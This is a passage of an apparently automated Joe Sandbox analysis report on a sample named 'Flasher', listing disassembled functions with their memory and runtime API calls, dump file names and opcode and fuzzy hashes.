Instruction Fuzzy Hash: E5F0A422A09B5942F6595B16A9563BDE3A0AF45F90F08807BCA4DE7B94CF3C64B2C305

Function 00007FF6D357C975 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,?,?,?,00007FF6D36070AB,?,?,?,?,?,?,?,?,?,00007FF6D3739C3D), ref: 00007FF6D357C99E

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ae617a080697acd2961305dd07b90a5fa0d4ca0d7bdc1ffd76f0a8751cb5af92
Instruction ID: a06e6e41f2c51f32ae876a26389d9ff5c4fc139c90744eda2c849776aa89f5c3
Opcode Fuzzy Hash: ae617a080697acd2961305dd07b90a5fa0d4ca0d7bdc1ffd76f0a8751cb5af92
Instruction Fuzzy Hash: 23F0C862E09B4692E7995721B94637DE2B1AF447C0F14C037CA8DE6798DF3CB4A5C301

Function 00007FF6D360B44B Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,?,00000008,?,00007FF6D3734E8D), ref: 00007FF6D360B474

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0a5f65c2f8ce7121faf4cd68b849d8c90c5837d17850cd0af747543237756997
Instruction ID: ff4df3f15cdb0bfd2338cd5b90c036bc509bf97d5780230df5b9b5d6042886be
Opcode Fuzzy Hash: 0a5f65c2f8ce7121faf4cd68b849d8c90c5837d17850cd0af747543237756997
Instruction Fuzzy Hash: 46F09661A09A8582F6585726B98737DB3A1EF487C0F14C03BCA4DD7799CFBC94A1D300

Function 00007FF6D36D80B0 Relevance: 1.5, APIs: 1, Instructions: 218COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,00000000,00000000,00007FF6D36D1E5F,00000000,00000000,00000080,00007FF6D3700310), ref: 00007FF6D36D82AB

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: f1a04a34d92d0b2dd32c21f822720fd695efd21a5531098416e3bfd2984fe55e
Instruction ID: efc0cc593d65ac8fe4b6df38a069d92e9ae3dd65083e475dc52b6da2276c3401
Opcode Fuzzy Hash: f1a04a34d92d0b2dd32c21f822720fd695efd21a5531098416e3bfd2984fe55e
Instruction Fuzzy Hash: 0791D622D086C381FB659F35A41623DABA0FB95B44F2D0132CE4DA3695DE38EC74D384

Function 00007FF6D34F529F Relevance: 1.4, APIs: 1, Instructions: 174COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140 ref: 00007FF6D34F5382

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 1c9a1b6bb6cdd98e2bf31c494d7692b1cbb634f3bc2db355a774a1ea0a3441a2
Instruction ID: c18aa489e53c55d05dfaec10c52a671f9d9fe2452734c5d8d5555c109d792197
Opcode Fuzzy Hash: 1c9a1b6bb6cdd98e2bf31c494d7692b1cbb634f3bc2db355a774a1ea0a3441a2
Instruction Fuzzy Hash: 4671B323A18B8585E7118B29E4013ADB760FB99794F049326EFCCA3B65EF38D1D6C700

Function 00007FF6D35517F7 Relevance: 1.4, APIs: 1, Instructions: 137COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140 ref: 00007FF6D3551906

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 08b7e1b0333714c28639a3e41d0c310d9b124c42977df98b89da8d7cb61fc176
Instruction ID: e3fab67b6d104e79d697c6b9567741c2a31b3a363917fd5ea00972b68f570b80
Opcode Fuzzy Hash: 08b7e1b0333714c28639a3e41d0c310d9b124c42977df98b89da8d7cb61fc176
Instruction Fuzzy Hash: 8B518072618B4582DA51DF16E4417BEBBA9FB84BC4F018226EF8E93754DF38E5A1C700

Function 00007FF6D3736286 Relevance: 1.4, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF6D373634B

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: bdb888ad571ac1a1a775bf4ce459e1b00bca3ad84a13d418de4d24e3bb05ea7d
Instruction ID: 45d5acd09290bf7675cb77e1f5048e4913fee040ea21e4cfe5f96e2a931451d3
Opcode Fuzzy Hash: bdb888ad571ac1a1a775bf4ce459e1b00bca3ad84a13d418de4d24e3bb05ea7d
Instruction Fuzzy Hash: 18515E32909F8582E6558B28E4413E9B3A0FB98744F149231DF9C63765EF7DE6E6C300

Function 00007FF6D35D469C Relevance: 1.3, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6D35D4733

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: 394aafa7f695e05f6b17ea05effd48d5cd9494e077184056a9c07229a719dfa3
Instruction ID: 841fba5008357b212794fbb1d3e1a182ca8e9d49b48ae72a0fe5c0f310b1f1df
Opcode Fuzzy Hash: 394aafa7f695e05f6b17ea05effd48d5cd9494e077184056a9c07229a719dfa3
Instruction Fuzzy Hash: 7431CE62A08AC492F6218B18E5077FCA7A0BFD4390F546132EE8963754EF3DD2E6C700

Function 00007FF6D36FB7D0 Relevance: 1.3, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF6D36FB8A8

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 255afd7bbd49559c9c1c0ad2d3633ddc98075649f743b2b0e0fd1ad74d2493d1
Instruction ID: 0f09e3203708327436dd69bebb386aa443ce59fa3847cf77c3d35f3ea31ce244
Opcode Fuzzy Hash: 255afd7bbd49559c9c1c0ad2d3633ddc98075649f743b2b0e0fd1ad74d2493d1
Instruction Fuzzy Hash: E131A232A08AC286FB51DF1AD4021ADB7A0FB84B94F594036DF5DA7355DF78E862D304

Function 00007FF6D372513C Relevance: 1.3, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,?,?,?,00000000,00007FF6D3724F68,?,?,?,00007FF6D36C62F8,?,?,?,00000000,00000035,?), ref: 00007FF6D37251AC

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: b73aebc9824220d4406ac8c5e877dfbf8c34f51f04008634f9eb9f571a2f8cf9
Instruction ID: b966c1a467251071b466aa4b6c8f7e94d64934b3a4545a92b7b70ae20ac7aef4
Opcode Fuzzy Hash: b73aebc9824220d4406ac8c5e877dfbf8c34f51f04008634f9eb9f571a2f8cf9
Instruction Fuzzy Hash: A1319C76A04B4986EB60CF56E58226DF7A0FB88B98F444136CB9D977A0DF38E461C304

Function 00007FF6D351084C Relevance: 1.3, APIs: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D35DF580: HeapFree.KERNEL32 ref: 00007FF6D35DF65D
Part of subcall function 00007FF6D35DF580: HeapFree.KERNEL32 ref: 00007FF6D35DF670

HeapFree.KERNEL32 ref: 00007FF6D35109D6

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 75784bba3a5c4cb6c0e07c280b0df7f94654d2762961b13be6326343fab125b9
Instruction ID: 9083e0151d3f031876ebde5f887cdb381de35cdbd703682d3254eaf708e9673c
Opcode Fuzzy Hash: 75784bba3a5c4cb6c0e07c280b0df7f94654d2762961b13be6326343fab125b9
Instruction Fuzzy Hash: 9131053260DFC584EAB19B01F4953AEB3A4FB88790F500226DA9D93B98DF7CD164CB40

Function 00007FF6D35226D9 Relevance: 1.3, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D35C292B: memmove.VCRUNTIME140 ref: 00007FF6D35C295B
Part of subcall function 00007FF6D35C292B: HeapFree.KERNEL32 ref: 00007FF6D35C2B02
Part of subcall function 00007FF6D35C292B: HeapFree.KERNEL32 ref: 00007FF6D35C2B1E

memmove.VCRUNTIME140 ref: 00007FF6D35227A8
memmove.VCRUNTIME140 ref: 00007FF6D3522803

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memmove$FreeHeap
String ID:
API String ID: 3670176668-0
Opcode ID: 24cd0a5175cc3f87a49d0122b432f461cce89a5e06771e81d0cd956646693bc3
Instruction ID: d4e9b054bf865309aed66118ce4a123c05b77f5122c33d28adaecb0a5279bda3
Opcode Fuzzy Hash: 24cd0a5175cc3f87a49d0122b432f461cce89a5e06771e81d0cd956646693bc3
Instruction Fuzzy Hash: C1215136608ADA84E7319F25D9022EDA366FB157C8F444023DF5D6BB99DF749257C300

Function 00007FF6D36FCA30 Relevance: 1.3, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,?,?,00007FF6D36C7678,?,?,?,?,?,?,?,?,?,?,?,00007FF6D36CB78C), ref: 00007FF6D36FCA97

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 8d62f2734a3bf02a247e999ca0c551cb2acf62cafb57320ccf0847f4c37948f8
Instruction ID: 0b9fb453cb43334950303727cd15b183051ca00f4e5cb9cb71df87c68f3e506c
Opcode Fuzzy Hash: 8d62f2734a3bf02a247e999ca0c551cb2acf62cafb57320ccf0847f4c37948f8
Instruction Fuzzy Hash: 14117032A15A8282FF54CF15D44212CA3A1FF88F80B148132DA1DA7B58DF39F8629740

Function 00007FF6D35353CA Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF6D3535401

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 2dd82f21153a70ee4ac70e065fbdbcac2d917120adbe96a3d1782e47097b9d4a
Instruction ID: 370bef15bbd05e60c6a6e8ba95fdcc9fe54586e94acb88d1209c383e01b0def4
Opcode Fuzzy Hash: 2dd82f21153a70ee4ac70e065fbdbcac2d917120adbe96a3d1782e47097b9d4a
Instruction Fuzzy Hash: 5C01DB72B1564581E9248B63AA057ADD616AB54BC4F545433CF4D6BB94CE7CF0938300

Function 00007FF6D360E884 Relevance: 1.3, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6D360E8D4

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: 1c9a3d7e26669ebbf3391206ca90e9278e1a2758ae338e4f844b6f670a435be5
Instruction ID: 6da02b31e21edf62041e32b3f0472604f8bb4a1f46cf3aa8a905ede877c1e73d
Opcode Fuzzy Hash: 1c9a3d7e26669ebbf3391206ca90e9278e1a2758ae338e4f844b6f670a435be5
Instruction Fuzzy Hash: 86018F66B09A5581F7619B16E40A36DA350FB89BE4F448232CE5CA7794DE3CC1A7D700

Function 00007FF6D34F5593 Relevance: 1.3, APIs: 1, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6D34F5600

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: b53abcabc7701217bd2bacb53f08686fb482c2d007113458eb5314565f16b943
Instruction ID: 5d148d084d611bfb35ee15f8f9c8d8604487afd4e688ecf7bd802ba301b08c55
Opcode Fuzzy Hash: b53abcabc7701217bd2bacb53f08686fb482c2d007113458eb5314565f16b943
Instruction Fuzzy Hash: 9E012663A0978886E681CF16CA0439D6B61AB68BC4F148133CE0D57351CE38D18AC301

Function 00007FF6D35D0760 Relevance: 1.3, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,?,00007FF6D35D317A,?,?,?,?,?,?,?,00007FF6D34F2B76), ref: 00007FF6D35D0791

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: 0cf790024e060a09d7562fea9b208c0383803c7baef20a400a55f23b3e197d1a
Instruction ID: eb3d0558e83ec300a09aa942a461851e982b2438b739c648aa5874fb41e5b0e3
Opcode Fuzzy Hash: 0cf790024e060a09d7562fea9b208c0383803c7baef20a400a55f23b3e197d1a
Instruction Fuzzy Hash: 18F0A752F1466843E8089B279E4505C87217F49FD46548932CF1CABF51DE38E0A39204

Function 00007FF6D3579517 Relevance: 1.3, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6D3579545

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: 484f76b7dd98c713c849314688a7edb80e6f9807086320dbb67360391f039a71
Instruction ID: 2b785ba892d0ad9c7df923989d7809ed8268bb1b1d459eb446884996b79217a3
Opcode Fuzzy Hash: 484f76b7dd98c713c849314688a7edb80e6f9807086320dbb67360391f039a71
Instruction Fuzzy Hash: 6DF0E592F08A6882F8089B2B9E450AC8721BF46FD0A54C432DF1CA7B91CE3CE0B35304

Function 00007FF6D34F5660 Relevance: 1.3, APIs: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6D34F569A

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 24fc8f555de91c18ec6f029fb012a5dbd92fd1b9f20d566367111128d877f169
Instruction ID: 5f9bcc49a31c7c3765c6ce2c449274684e64f832326b6f9406f31a6badbc9def
Opcode Fuzzy Hash: 24fc8f555de91c18ec6f029fb012a5dbd92fd1b9f20d566367111128d877f169
Instruction Fuzzy Hash: 92E09251B09A5941F9059B07ED057AE9711AB8DFE0F588032DE0CEB364DD3CD593C300

Function 00007FF6D36DF0D4 Relevance: 1.3, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,?,?,00007FF6D370C018), ref: 00007FF6D36DF105

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: ad9b193378f6be3bce2e1266d139fc241371396e7ab461da71bc73f83ba56772
Instruction ID: c2fa3eb3123f47039710a6746a4ec7c80a0ee273f25fc65f965587dcba10b5e4
Opcode Fuzzy Hash: ad9b193378f6be3bce2e1266d139fc241371396e7ab461da71bc73f83ba56772
Instruction Fuzzy Hash: 61E04F11F0E6C240BE5896A7B56207D82909FC8BC0F2C8036DD1D9F78AED2CE4615200

Function 00007FF6D3576573 Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00007FF6D357657F

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 763d77e646f3c004bd174ae1544fbf920f9fe5fca69a20b1e8dfbc8da6d2a2a3
Instruction ID: 49eacb8f423db3db33a75da426c08e999db3c0e34ccdb2634c9c9f8022a48029
Opcode Fuzzy Hash: 763d77e646f3c004bd174ae1544fbf920f9fe5fca69a20b1e8dfbc8da6d2a2a3
Instruction Fuzzy Hash: 5EE02621E08C16C2E695A71AF8470BD9350EFC8BB4B40C332C93CA62E8CE2898E35304

Function 00007FF6D36F984C Relevance: 1.3, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,?,00000000,00007FF6D36D7D38,00000000,?,?,00007FF6D3682865,?,?,?,00007FF6D371E52D), ref: 00007FF6D36F986E

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

